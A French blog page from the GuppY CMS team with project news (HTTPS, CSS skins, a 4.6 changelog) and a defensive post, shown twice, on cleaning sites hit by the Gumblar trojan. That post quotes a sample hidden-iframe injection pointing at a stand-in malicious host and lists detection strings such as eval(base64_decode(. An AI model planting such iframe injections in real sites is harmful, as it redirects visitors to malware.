En poursuivant votre navigation sur ce site, vous acceptez l'utilisation de cookies pour vous proposer des contenus et services adaptés. Mentions légales.

GuppY, le CMS de référence sans base de données

 
 

telecharger01.png

 
Vous êtes ici :   Accueil » BloggY
 
Prévisualiser...  Imprimer...  Imprimer la page...
Prévisualiser...  Imprimer...  Imprimer la section...
BloggY
Rubriques
Derniers billets
Derniers commentaires
Calendrier du blog
08-2018 Septembre 2018
L M M J V S D
          01 02
03 04 05 06 07 08 09
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Tous les billets
Activation du protocole HTTPS  -  par Guppy_Team

Bonjour à toutes et à tous,
 

L'une des nouveautés de la prochaine version de GuppY sera la prise en compte du protocole sécurisé HTTPS.

Vous avez sans doute lu dans la presse spécialisée que dans un futur proche les sites non sécurisés ne seront plus référencés, ou moins bien référencés, dixit Google par exemple.

Nous ne cédons pas à une mode, mais nous le proposons pour une plus grande sécurisation de vos données, pour la protection de votre vie privée.

Vos connexions sur votre site, celle de vos visiteurs seront entièrement cryptées et sécurisées.

Dans votre navigateur, vous pouvez voir la liste des systèmes utilisés en plaçant votre curseur sur le petit cadenas vert quand vous êtes sur une page en HTTPS.

Ce protocole peut déjà être activé en mutualisé chez certains hébergeurs comme notre partenaire Nuxit bien sûr, également chez OVH et 1&1 chez lesquels nous disposons d'un nom de domaine pour nos tests.

Passer en HTTPS induit quelques contraintes, la première ce sont les liens externes, images, vidéos et documents encapsulés dans un iframe qui ne sont plus admis, seules les iframes du site peuvent être affichées.

Attention, la totalité de votre site doit être sécurisé, il ne peut pas y avoir de contenu mixte.

Le cadenas vert vous indique que les communications entre votre navigateur et le site web sont sûres. Personne ne peut les espionner, et personne ne peut trafiquer les communications. Mais il ne garantie rien d'autre !

Soyez vigilants, et ne confiez pas n'importe quelle information sur n'importe quel site, cadenas ou pas.

Selon les modalités prévues par votre hébergeur, il ne vous restera à faire, dans le .htaccess de la racine, qu'une redirection HTTP => HTTPS permettant de renvoyer tous vos visiteurs vers la version sécurisée.

Sur tous les sites officiels GuppY, le protocole sécurisé HTTPS est activé.

Malgré nos recherches, si vous voyez le cadenas vert avec un avertissement pour du contenu mixte, merci de nous signaler la page.

La GuppY Team

Publié le 10/11/2016 @ 21:19 

Information importante pour la mise à jour des skins et leur personnalisation
 


Bonjour à tous,

La prochaine version 5.01.03 de GuppY doit être disponible en téléchargement début Juin, elle doit apporter son lot de nouveautés, modifications et corrections.

Parmi celles-ci, une modification importante est la suppression dans tous les fichiers de tous les styles d’affichage pour les regrouper dans les fichiers css de GuppY comme le recommandent toutes les normes.
Notre ami Saxbar y travaille depuis plusieurs mois et nous voyons poindre la fin des corrections, les  premiers tests sont très encourageants et nous invitent à poursuivre dans cette voie.

A vrai dire nous n’avons pas trop le choix, si nous voulons poursuivre le développement de GuppY 5 et être résolument sur la voie d’un CMS moderne, toujours à la pointe des nouvelles technologies du web. Après la sortie de GuppY 5.01.00 à la mi-juin 2015, c’est une nouvelle étape importante.

Nous sommes conscients des changements que cela suppose pour les skins de GuppY, pour les utilisateurs de GuppY :

- l’utilisation de skins compatibles avec config look est indispensable avec des avantages certains, un clic sur Générer Style et un ou plusieurs rafraîchissements de la page et votre skin sera à jour pour la version 5.01.03 . Vous n’aurez rien d’autre à faire !

- la personnalisation de l’habillage de votre site doit se faire dans le fichier styleplus.css exclusivement. Si vous avez fait des modifications directement dans le fichier style.css, vous avez un peu plus d’un mois pour les reporter dans le fichier styleplus.css. Si vous ne le faites pas, vous ne pourrez pas mettre à jour votre skin et la modification manuelle du fichier style.css ne sera plus possible.

- pour l’avenir, à chaque patch, vous pourrez mettre à jour votre skin d’un seul clic sur Générer Style.

A ce jour, près d’une centaine de skins sont compatibles Config look, le tutoriel d’utilisation de config look sera mis à jour sur le Centre d’Aide GuppY avant la sortie de la 5.01.03, et bien sûr toute l'équipe sera présente pour vous aider.

Nous vous remercions pour votre fidélité à GuppY, pour votre soutien qui est important pour nous.

Cordialement

La GuppY Team

Publié le 30/04/2016 @ 17:20 
Mise en service de la création automatique de fils twitter à partir du bloggy de http://www.freeguppy.org
Publié le 05/01/2011 @ 04:52 
caution.gif
Suite à des demandes récurrentes sur le forum et bien que GuppY n'ait rien à voir avec des problèmes de sécurité liés à ce ver / cheval de Troie qui est connu sous différentes appellations et qui peut attaquer n'importe quel site quelle que soit sa programmation, nous vous donnons ci-dessous quelques informations pour lutter contre :
  • Gumblar, Martuz, Troj / JSRedir-R et consorts se propagent sur le Net via des sites web infectés en profitant de failles de logiciels qui ne sont pas à jour sur les PC des administrateurs, webmasters, modérateurs ou rédacteurs de sites qui ont accès aux FTP de leurs sites.
  • Des failles ont été notamment repérées sur les logiciels Adobe (Adobe Acrobat Reader, Adobe Flash Player, ...) non mis à jour mais il n'est pas exclu que d'autres logiciels non mis à jour puissent avoir des failles potentielles.
  • Si le cheval de Troie a réussi à s'installer sur le PC d'un des administrateurs, webmasters, modérateurs ou rédacteurs d'un site faute d'avoir un antivirus efficace et à jour, celui-ci récupère les codes d'accès FTP du site concerné et ensuite tout est évidemment possible.
  • Le site sera à son tour pollué par les pirates et va en polluer d'autres.

Comment s'aperçoit-on que son site est infecté :

  • Si votre antivirus ou votre anti-spyware vous indique une attaque iframe.
  • Si Google ou un autre moteur de recherche indique que votre site est dangereux.
  • Si votre hébergeur bloque le site pour cette raison.
  • Si votre navigateur vous redirige vers un site douteux ou qu'il vous demande si vous acceptez cette redirection.
  • Si vous vous apercevez que de nouveaux fichiers et/ou répertoires ont été installés à votre insu sur votre FTP ou que le poids de certains fichiers a changé.
  • ...

Que se passe-il sur le site infecté ?
  • Des fichiers sont altérés par des commandes d'iframe du genre :
"<.iframe src="http://site_pollueur.cn:8080/index.php" width=100 height=150 style="visibility: hidden"></iframe.>"
Car souvent les iframes sont invisibles sur le site (visibility: hidden)
  • Dans certains cas, les pirates installent des scripts plus ou moins puissants capables de lancer des attaques depuis votre site vers d'autres sites ou même vers votre serveur.
  • Dans d'autres cas une partie du code est codé en Base64 ce qui donne des chaînes du genre :
Qm9uam91cg== qui est égal à Bonjour confused
aWZyYW1l qui est égal à iframe confused
  • Les fichiers les plus couramment infectés sont les fichiers index avec n'importe quelle extension (html, htm, php,...), mais n'importe quel fichier et même des images ou faux fichiers d'images peuvent l'être !
     
Que faire en cas d'infection ?
  • Il faut d'abord scanner son PC avec un antivirus efficace et à jour ou un antispyware. A noter que le premier antivirus ou l'un des premiers à détecter et bloquer ces attaques est  Avast même dans sa version gratuite. Celui-ci a d'ailleurs été victime de railleries à cette époque en disant qu'il générait des "faux positifs".
  • Mettre à jour Windows ou son OS quel qu'il soit si ce n'est pas fait.
  • Mettre à jour ses logiciels (En particulier les logiciels Adobe).
  • Demander à tous les éventuels administrateurs, modérateurs ou rédacteurs de vos sites de faire de même.

En ce qui concerne la désinfection du site (ou des sites) lui-même si l'on est sous un PC Windows avec un hébergement mutualisé :
  • Rapatrier le site en local via le FTP et le passer à l'antivirus
  • Rechercher les fichiers qui semblent être en plus lourds ou qui semblent avoir un poids différent.
  • Rechercher dans tous les fichiers des chaînes de caractères suspectes telles que iframe, hidden, ... Notepad++, entre autres, peut faire cela ainsi que comparer des fichiers de même nom (un fichier d'origine d'un pack GuppY neuf et un fichier de la sauvegarde du site pollué).
  • Remplacer ou réparer les fichiers infectés et supprimer les fichiers surnuméraires.
  • Passer à nouveau l'antivirus.
  • Changer les codes FTP (au moins le mot de passe) si possible depuis un autre PC qui n'a pas été infecté.
  • Envoyer à nouveau les fichiers et dossiers du site désinfecté sur le serveur.
  • Tester le site en ligne après avoir vidé le cache du ou des navigateurs. 

Si vous avez accès au serveur Linux / Unix via une console SSH (Cas d'un serveur dédié, semi-dédié, serveur privé virtuel (VPS) ) ou si votre site est hébergé chez vous sous Linux ou Unix :
  • Vous pouvez faire une recherche sur tout ou partie du serveur ou des sites installés sur celui-ci à l'aide des commandes grep et find sur les mots clefs indiqués plus haut ou d'autres comme eval(base64_decode( , mais dans ce cas les habitués de Linux / Unix savent faire.

Précautions à prendre :
  • Mettre à jour ses logiciels et demander aux autres administrateurs du site de faire de même.
  • Mettre à jour les antivirus et antispywares et demander aux autres administrateurs du site de faire de même.
  • Eviter d'enregistrer ses mots de passe FTP en particulier et les taper à chaque fois.
  • Chmoder le plus de fichiers possibles en 444 (lecture seule) et en particulier les fichiers index et même les .htaccess.

Il ne faut évidemment pas chmoder de cette façon les fichiers qui doivent être en lecture / écriture tel que les fichiers de données et d'autres qui ne pourraient plus être édités ou incrémentés.

Un autre inconvénient du chmodage en lecture seule c'est qu'il faudra les remettre en lecture écriture (644 - 666) avant de placer un patch ou de faire une migration mais c'est le prix à payer pour avoir une certaine sécurité supplémentaire.
  • Il existe également des softs qui sont capables d'éradiquer ces troyens mais ils sont en général payants.
Ces explications glanées ici et là ainsi que le fruit de nos expériences personnelles ne sont en aucun cas exhaustives d'autant plus que ces malwares évoluent sans cesse.
 
Pour plus d'information il faut taper dans Google ou votre moteur de recherche favori l'un des mots clefs ci-dessous ou plusieurs d'entre eux :
Iframe Gumblar Martuz Troj / JSRedir-R
 
Bon courage en cas d'infection.
JeandePeyrat pour GuppY Team.
Publié le 02/06/2010 @ 16:19 
Suite à des demandes récurrentes sur le forum et bien que GuppY n'ait rien à voir avec des problèmes de sécurité liés à ce ver / cheval de Troie qui est connu sous différentes appellations et qui peut attaquer n'importe quel site quelle que soit sa programmation, nous vous donnons ci-dessous quelques informations pour lutter contre :
  • Gumblar, Martuz, Troj / JSRedir-R et consorts se propagent sur le Net via des sites web infectés en profitant de failles de logiciels qui ne sont pas à jour sur les PC des administrateurs, webmasters, modérateurs ou rédacteurs de sites qui ont accès aux FTP de leurs sites.
  • Des failles ont été notamment repérées sur les logiciels Adobe (Adobe Acrobat Reader, Adobe Flash Player, ...) non mis à jour mais il n'est pas exclu que d'autres logiciels non mis à jour puissent avoir des failles potentielles.
  • Si le cheval de Troie a réussi à s'installer sur le PC d'un des administrateurs, webmasters, modérateurs ou rédacteurs d'un site faute d'avoir un antivirus efficace et à jour, celui-ci récupère les codes d'accès FTP du site concerné et ensuite tout est évidemment possible.
  • Le site sera à son tour pollué par les pirates et va en polluer d'autres.
Comment s'aperçoit-on que son site est infecté :
  • Si votre antivirus ou votre anti-spyware vous indique une attaque iframe.
  • Si Google ou un autre moteur de recherche indique que votre site est dangereux.
  • Si votre hébergeur bloque le site pour cette raison.
  • Si votre navigateur vous redirige vers un site douteux ou qu'il vous demande si vous acceptez cette redirection.
  • Si vous vous apercevez que de nouveaux fichiers et/ou répertoires ont été installés à votre insu sur votre FTP ou que le poids de certains fichiers a changé.
  • ...
Que se passe-il sur le site infecté ?
  • Des fichiers sont altérés par des commandes d'iframe du genre :
"<.iframe src="http://site_pollueur.cn:8080/index.php" width=100 height=150 style="visibility: hidden"></iframe.>"
Car souvent les iframes sont invisibles sur le site (visibility: hidden)
  • Dans certains cas, les pirates installent des scripts plus ou moins puissants capables de lancer des attaques depuis votre site vers d'autres sites ou même vers votre serveur.
  • Dans d'autres cas une partie du code est codé en Base64 ce qui donne des chaînes du genre :
Qm9uam91cg== qui est égal à Bonjour confused
aWZyYW1l qui est égal à iframe confused
  • Les fichiers les plus couramment infectés sont les fichiers index avec n'importe quelle extension (html, htm, php,...), mais n'importe quel fichier et même des images ou faux fichiers d'images peuvent l'être !
     
Que faire en cas d'infection ?
  • Il faut d'abord scanner son PC avec un antivirus efficace et à jour ou un antispyware. A noter que le premier antivirus ou l'un des premiers à détecter et bloquer ces attaques est  Avast même dans sa version gratuite. Celui-ci a d'ailleurs été victime de railleries à cette époque en disant qu'il générait des "faux positifs".
  • Mettre à jour Windows ou son OS quel qu'il soit si ce n'est pas fait.
  • Mettre à jour ses logiciels (En particulier les logiciels Adobe).
  • Demander à tous les éventuels administrateurs, modérateurs ou rédacteurs de vos sites de faire de même.

En ce qui concerne la désinfection du site (ou des sites) lui-même si l'on est sous un PC Windows avec un hébergement mutualisé
:
  • Rapatrier le site en local via le FTP et le passer à l'antivirus
  • Rechercher les fichiers qui semblent être en plus lourds ou qui semblent avoir un poids différent.
  • Rechercher dans tous les fichiers des chaînes de caractères suspectes telles que iframe, hidden, ... Notepad++, entre autres, peut faire cela ainsi que comparer des fichiers de même nom (un fichier d'origine d'un pack GuppY neuf et un fichier de la sauvegarde du site pollué).
  • Remplacer ou réparer les fichiers infectés et supprimer les fichiers surnuméraires.
  • Passer à nouveau l'antivirus.
  • Changer les codes FTP (au moins le mot de passe) si possible depuis un autre PC qui n'a pas été infecté.
  • Envoyer à nouveau les fichiers et dossiers du site désinfecté sur le serveur.
  • Tester le site en ligne après avoir vidé le cache du ou des navigateurs. 

Si vous avez accès au serveur Linux / Unix via une console SSH (Cas d'un serveur dédié, semi-dédié, serveur privé virtuel (VPS) ) ou si votre site est hébergé chez vous sous Linux ou Unix
:
  • Vous pouvez faire une recherche sur tout ou partie du serveur ou des sites installés sur celui-ci à l'aide des commandes grep et find sur les mots clefs indiqués plus haut ou d'autres comme eval(base64_decode( , mais dans ce cas les habitués de Linux / Unix savent faire.
 
Précautions à prendre :
  • Mettre à jour ses logiciels et demander aux autres administrateurs du site de faire de même.
  • Mettre à jour les antivirus et antispywares et demander aux autres administrateurs du site de faire de même.
  • Eviter d'enregistrer ses mots de passe FTP en particulier et les taper à chaque fois.
  • Chmoder le plus de fichiers possibles en 444 (lecture seule) et en particulier les fichiers index et même les .htaccess.

Il ne faut évidemment pas chmoder de cette façon les fichiers qui doivent être en lecture / écriture tel que les fichiers de données et d'autres qui ne pourraient plus être édités ou incrémentés.
 
Un autre inconvénient du chmodage en lecture seule c'est qu'il faudra les remettre en lecture écriture (644 - 666) avant de placer un patch ou de faire une migration mais c'est le prix à payer pour avoir une certaine sécurité supplémentaire.
 
  • Il existe également des softs qui sont capables d'éradiquer ces troyens mais ils sont en général payants.
Ces explications glanées ici et là ainsi que le fruit de nos expériences personnelles ne sont en aucun cas exhaustives d'autant plus que ces malwares évoluent sans cesse.
 
Pour plus d'information il faut taper dans Google ou votre moteur de recherche favori l'un des mots clefs ci-dessous ou plusieurs d'entre eux :
Iframe Gumblar Martuz Troj / JSRedir-R

Bon courage en cas d'infection.
JeandePeyrat pour GuppY Team.
Publié le 02/06/2010 @ 16:19 
Zones d'admin à vérifier  -  par GuppY_Team

Bonjour,

pensez de temps en temps à aller jeter un oeil dans votre section admin / Recommander  vous pouvez  y trouver du spam  frown  

dans le cas ou vous seriez la cible de spammeurs, vous pouvez installer le plork cryptograph que vous trouverez chez Hpsam ( membre de la GuppYteam )

 

Une autre section à visiter est  admin / Maintenance , qui n'est ni plus ni moins qu'une corbeille ou sont stockés les datas que vous avez supprimés par ailleurs , pensez à la vider de temps en temps et à faire un contrôle d'intégrité ensuite wink

 

Publié le 31/05/2008 @ 23:15 

Pour savoir si l'on a été infecté :caution.gif

faites l'inventaire des différents répertoires de votre site, par FTP,  en classant vos fichiers par date dans le répertoire distant . ( suivant le logiciel ftp que vous utilisez )


Exemple avec filezilla

cleanup.jpg


il se peut que vous y trouviez des fichiers datés de ces derniers jours avec des noms "bizarre" ( d.php , cmdwork.txt , ...) ou même des fichiers index.html ou encore des fichiers .jpg qui ne sont pas des images et qui n'ont rien à faire là ! , supprimez-les


la technique qui consiste à rapatrier son site et le passer à l'anti virus , peut aussi porter ses fruits , vous pouvez y trouver des troyens  frown

Publié le 12/11/2007 @ 13:15 
Ordonner le menu  -  par GuppYTeam
Chacun connait l'astuce pour ordonner ses articles dans les boites du même nom, il suffit de rajouter des balises cachées devant les titres, comme <!--01-->, <!--02--> ou <!--03--> par exemple.

Mais saviez-vous que depuis GuppY 4.6 il est possible de faire la même chose avec les icônes du menu ? cool

Rendez-vous dans votre admin > config section et essayez.

En faisant de même avec les noms des plugins vous pouvez intercaler les plugins au milieu des items GuppY.
Publié le 05/06/2007 @ 14:01 
4.6 quelles nouveautés ?  -  par GuppY_Team

Cette version 4.6 n'est point une "révolution" mais une ultime évolution de la série 4.


Attention, il s'agit d'une migration, les skins et forks 4.5 doivent être adaptés, la majorité des plugins doivent être compatible mais il vaut mieux tester.
Certains plugins, forks sont maintenant intégrés tel FCKeditor, Infostech, Fork Blog (un vrai blog maintenant), PGeditor, Fork tri RSS, Fork droits admin plugins.
Avec cette nouvelle mouture arrive un nouveau manuel général, un manuel pour la partie configuration skins qui a beaucoup changée et un manuel sur la création de plugins pour GuppY 4.6.

La grande nouveauté : un Blog !

Moteur :

+ Validation XHTML
* Remplacement des short tags php pour compatibilité php5
* Plein de petites modifications par çi par là pour améliorer plein de choses

Interface :

+ Choix Blog ou Portail en accueil
+ Les items du menu peuvent être ordonnée via la balise
+ Le menu peut être mis dans une boite latérale
+ Plus de position de boites latérales
+ Ajout d'une position de boite supplémentaire sous la boite centrale
+ Le haut de page peut être réorganisé via config boite
+ Possibilité de se connecter/déconnecter facilement
+ Ajout d'un sélecteur de résolution (désactivable dans la skin)
* Logo et copyright en imagettes
* Remplacement de l'éditeur wysiwyg TypeTool par FCKeditor compatible xhtml
* Remplacement du mini-éditeur d'admin
* Remplacement de l'éditeur wysiwyg de postguest par PGeditor
* Amélioration de l'accessibilité et du fonctionnement sans javascript

Administration :

+ Séparation en 4 parties : Configuration skin, Administration, générale, administration des données, Administration des plugins

Configuration skin
+ prévisualisation des avatars, smileys, compteurs et icônes
* Config boites plus intuitive avec 2 boites latérales supplémentaires, possibilité de mettre une autre boite (à choisir) en colonne centrale et/ou en bas de page, possibilité de modifier la position des éléments du haut de page.

Administration, générale
+ La partie à propos permet de vérifier si vous avez la dernière version de GuppY
+ La partie à propos vous donne accès à un récapitulatif d'information à coller dans vos messages sur le forum.
* Les rédacteurs deviennent collaborateurs avec 4 status : Rédacteurs,Modérateur, Webmestre ou Administrateur. Ce status est visible dans le forum.
* Le mot de passe d'un collaborateur n'est plus fixé par l'admin, c'est son mot de passe membre.
+ Possibilité de donner les droits aux collaborateurs sur l'ensemble d'une des 4 parties de l'admin en 1 clic.
+ Les collaborateur ont accès à l'admin rapide des zones qu'ils gèrent.
* Choix du message du livre d'or en page d'accueil, simplifié.
+ Possibilité d'ajouter son identifiant de messagerie instantanée comme moyen de contact Webmaster.

Administration des données
+ Admin rapide selon les droit de chacun des collaborateurs

Administration des plugins
+ Il est possible de donner des droits sur les plugins aux rédacteurs

Articles :

+ Flux RSS des derniers articles

Blog :

+ En pleine page ou intégré au site
+ En page d'accueil pour transformer le portail en blog
+ Boite RSS des amis pour le Blog
+ Publication RSS des derniers billets

Forum :

+ Edition de ses messages
+ Blocage d'un fil en tête de liste
+ Possibilité de clore un fil de discussion
+ Signalisation des messages récents
+ Accès direct au dernier message du fil depuis la liste des fils
+ Choix d'une gamme de rang depuis l'admin
+ Affichage d'une charte
+ Affichage en pleine page du forum
+ Le nombre de catégorie n'est plus limité à 10
+ Possibilité d'ajouter plein de smileys en sus du pack de base.

Newsletter :

* impossibilité d'avoir 2 inscrits avec le même pseudo
+ vérification de l'existance de l'adresse mail
+ possibilité de trier dans différents ordres (chronologique, alphabétique...) les abonnés
+ possibilité de vérifier l'existence des adresses (indicatif)

Photos :

+ Possibilité d'uploader les photos sur la même page que la sélection de photos
+ Rubrique photo relooké avec mignature et effet pellicule photo
+ Evolution des modules photo et photorama avec possibilité de sous-dossiers

RSS :

* Amélioration du lecteur pour contourner certaines restrictions
+ Les flux RSS peuvent être ordonnés via la balise

Téléchargement :

+ ajout d'un accord de licence avant téléchargement

Skin :

* déplacement du répertoire skin : /inc/img/skin/ devient /skin/
+ remplacement du tableau pour le menu par une liste, chaque élément a une classe, la section en cours a une classe spécifique.
+ de nouvelles skins pour le pack original.
+ La position des boites latérales et liée au skin
+ La feuille de style.css est toujours externe
+ Gestion intégrée de la feuille CSS

Autres :

+ Suppression de ses MP par lot
+ Les plugins peuvent afficher des informations dans les zones d'entête de page, et bas de page en plus des boites latérales et de la zones centrale
* La page d'erreur personnalisé renvoie le bon code, plus message de Google "votre page d'erreur renvoie le code 200..."


Voilà il ne vous reste plus qu'à tester et migrer.
Publié le 04/06/2007 @ 10:48 
Vous êtes ici :   Accueil » BloggY
 
Préférences

Se reconnecter :
Votre nom (ou pseudo) :
Votre mot de passe
<O>


  13843839 visiteurs
  11 visiteurs en ligne

Connectés :
( personne )
Snif !!!
Newsletter
Pour avoir des nouvelles de ce site, inscrivez-vous à notre Newsletter.

Avant de soumettre ce formulaire, veuillez lire et accepter les Mentions légales.

J'accepte :
Recopier le code :
Site enregistré à la CNIL sous l'agrément 1040387.
Vous disposez d'un droit d'accès, de modification, de rectification
et de suppression des données selon la loi Informatique et Liberté (article 34) du 6 janvier 1978.

 
FreeGuppY.org est hébergé sur un serveur dédié LWS
 
gy_twitter02.png